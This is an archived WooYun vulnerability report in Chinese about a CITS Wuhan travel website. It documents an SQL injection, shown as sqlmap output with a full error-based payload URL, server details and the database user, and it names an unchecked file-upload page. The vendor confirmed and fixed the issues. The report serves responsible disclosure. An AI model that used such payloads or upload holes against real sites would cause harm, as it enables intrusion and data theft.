乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-29: 细节已通知厂商并且等待厂商处理中 2015-06-01: 厂商已经确认,细节仅向厂商公开 2015-06-01: 厂商已经修复漏洞并主动公开,细节向公众公开
20rank多吗?
中国国旅武汉分站:http://www.whcits.com问题1:SQL注入问题URL:http://www.whcits.com//xianlu.aspx?id=04001377155&qu=-1*证明:
sqlmap identified the following injection points with a total of 59 HTTP(s) requests:---Place: URIParameter: #1* Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: http://www.whcits.com:80//xianlu.aspx?id=04001377155&qu=-1' AND 9186=CONVERT(INT,(SELECT CHAR(113)+CHAR(119)+CHAR(117)+CHAR(111)+CHAR(113)+(SELECT (CASE WHEN (9186=9186) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(100)+CHAR(110)+CHAR(113))) AND 'qRQE'='qRQE---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: URIParameter: #1* Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: http://www.whcits.com:80//xianlu.aspx?id=04001377155&qu=-1' AND 9186=CONVERT(INT,(SELECT CHAR(113)+CHAR(119)+CHAR(117)+CHAR(111)+CHAR(113)+(SELECT (CASE WHEN (9186=9186) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(100)+CHAR(110)+CHAR(113))) AND 'qRQE'='qRQE---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005current user: 'wuhancits'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---
问题2:任意上传地址http://www.whcits.com/manage/chuantu.aspx对文件名没有校验,任何文件都可上传
话说你们的处理速度真快,昨天发现的今天就处理啦
危害等级:低
漏洞Rank:5
确认时间:2015-06-01 10:06
非常感谢您的报告,问题已处理,十分感谢您对中国国旅的支持。
2015-06-01:已过滤